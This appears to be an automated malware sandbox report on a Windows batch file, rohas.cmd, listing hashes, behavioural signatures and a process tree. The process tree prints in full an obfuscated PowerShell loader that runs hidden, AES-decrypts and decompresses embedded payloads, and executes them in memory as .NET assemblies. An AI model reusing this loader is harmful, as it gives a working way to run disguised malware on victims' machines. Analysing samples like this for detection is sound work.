77d4df8d32255d67d3778b8606c34f566173080753fa3637ad38c2a16c3b77c9

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
06/03/2024, 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rohas.cmd
Size

345KB
MD5

e6736aec016eec75551f9f06a29cbf4b
SHA1

3688e043b5a6bfbf99b9efb76b23f679c58ff3c0
SHA256

77d4df8d32255d67d3778b8606c34f566173080753fa3637ad38c2a16c3b77c9
SHA512

8ea2c1ac4af843813e9874adf96a70951b3b00b1fe3fd227c026dbd7edb28bd2adba9f0f3f2cb183387d38e96ffbaf0a9766b83f4058f795d1ca765a7f2534b7
SSDEEP

6144:GaG/W1aZlSGkwGCWhGAeNCcbdX3JxR6qLlhkmNfrGqAYzpJo8AdY:Gle1aZtjWIAendHjp/D48AdY

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2132	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2132	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2132	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2260 wrote to memory of 1632	2260	cmd.exe	29
PID 2260 wrote to memory of 1632	2260	cmd.exe	29
PID 2260 wrote to memory of 1632	2260	cmd.exe	29
PID 1632 wrote to memory of 2972	1632	cmd.exe	31
PID 1632 wrote to memory of 2972	1632	cmd.exe	31
PID 1632 wrote to memory of 2972	1632	cmd.exe	31
PID 1632 wrote to memory of 2132	1632	cmd.exe	32
PID 1632 wrote to memory of 2132	1632	cmd.exe	32
PID 1632 wrote to memory of 2132	1632	cmd.exe	32
PID 1632 wrote to memory of 2132	1632	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rohas.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rohas.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rohas.cmd';$GVgI='EUwGFntrUwGFyUwGFPoiUwGFnUwGFtUwGF'.Replace('UwGF', ''),'DCrUYecCrUYoCrUYmpCrUYreCrUYssCrUY'.Replace('CrUY', ''),'ReaNUVodLNUVoineNUVosNUVo'.Replace('NUVo', ''),'SpISSDlISSDitISSD'.Replace('ISSD', ''),'CoMGAdpyMGAdToMGAd'.Replace('MGAd', ''),'CreiDesatiDeseiDesDiDesecriDesypiDestoriDes'.Replace('iDes', ''),'TrCchWansCchWfCchWorCchWmCchWFinCchWaCchWlCchWBlCchWoCchWcCchWkCchW'.Replace('CchW', ''),'GeIGEOtIGEOCuIGEOrrIGEOentIGEOProIGEOcesIGEOsIGEO'.Replace('IGEO', ''),'ChsCepansCepgesCepEsCepxtsCepenssCepisCeposCepnsCep'.Replace('sCep', ''),'EldyHiemdyHiendyHitAdyHitdyHi'.Replace('dyHi', ''),'LoEkSEadEkSE'.Replace('EkSE', ''),'FrVkjSomVkjSBVkjSasVkjSe6VkjS4SVkjStVkjSrVkjSingVkjS'.Replace('VkjS', ''),'InUTQRvoUTQRkeUTQR'.Replace('UTQR', ''),'MnjwfanjwfinjwfnMnjwfonjwfdulnjwfenjwf'.Replace('njwf', '');powershell -w hidden;function jqCHa($TOSox){$IUDua=[System.Security.Cryptography.Aes]::Create();$IUDua.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IUDua.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IUDua.Key=[System.Convert]::($GVgI[11])('EmmGuAFgynYUTxopf371RlY8it1pD0ysy5nbvDncZoA=');$IUDua.IV=[System.Convert]::($GVgI[11])('M8ijoaT1KSbDvQ8ZGSseAQ==');$kEmGY=$IUDua.($GVgI[5])();$AoyMm=$kEmGY.($GVgI[6])($TOSox,0,$TOSox.Length);$kEmGY.Dispose();$IUDua.Dispose();$AoyMm;}function NuZVv($TOSox){$UzaCA=New-Object System.IO.MemoryStream(,$TOSox);$zVnJc=New-Object System.IO.MemoryStream;$PwuYx=New-Object System.IO.Compression.GZipStream($UzaCA,[IO.Compression.CompressionMode]::($GVgI[1]));$PwuYx.($GVgI[4])($zVnJc);$PwuYx.Dispose();$UzaCA.Dispose();$zVnJc.Dispose();$zVnJc.ToArray();}$tIIGd=[System.IO.File]::($GVgI[2])([Console]::Title);$TUxNw=NuZVv (jqCHa ([Convert]::($GVgI[11])([System.Linq.Enumerable]::($GVgI[9])($tIIGd, 5).Substring(2))));$GpJGP=NuZVv (jqCHa ([Convert]::($GVgI[11])([System.Linq.Enumerable]::($GVgI[9])($tIIGd, 6).Substring(2))));[System.Reflection.Assembly]::($GVgI[10])([byte[]]$GpJGP).($GVgI[0]).($GVgI[12])($null,$null);[System.Reflection.Assembly]::($GVgI[10])([byte[]]$TUxNw).($GVgI[0]).($GVgI[12])($null,$null); "
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2132

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2132-2-0x0000000074080000-0x000000007462B000-memory.dmp

Filesize
5.7MB

Download
memory/2132-3-0x0000000074080000-0x000000007462B000-memory.dmp

Filesize
5.7MB

Download
memory/2132-5-0x0000000002CE0000-0x0000000002D20000-memory.dmp

Filesize
256KB

Download
memory/2132-4-0x0000000002CE0000-0x0000000002D20000-memory.dmp

Filesize
256KB

Download
memory/2132-6-0x0000000074080000-0x000000007462B000-memory.dmp

Filesize
5.7MB

Download
memory/2132-7-0x0000000002CE0000-0x0000000002D20000-memory.dmp

Filesize
256KB

Download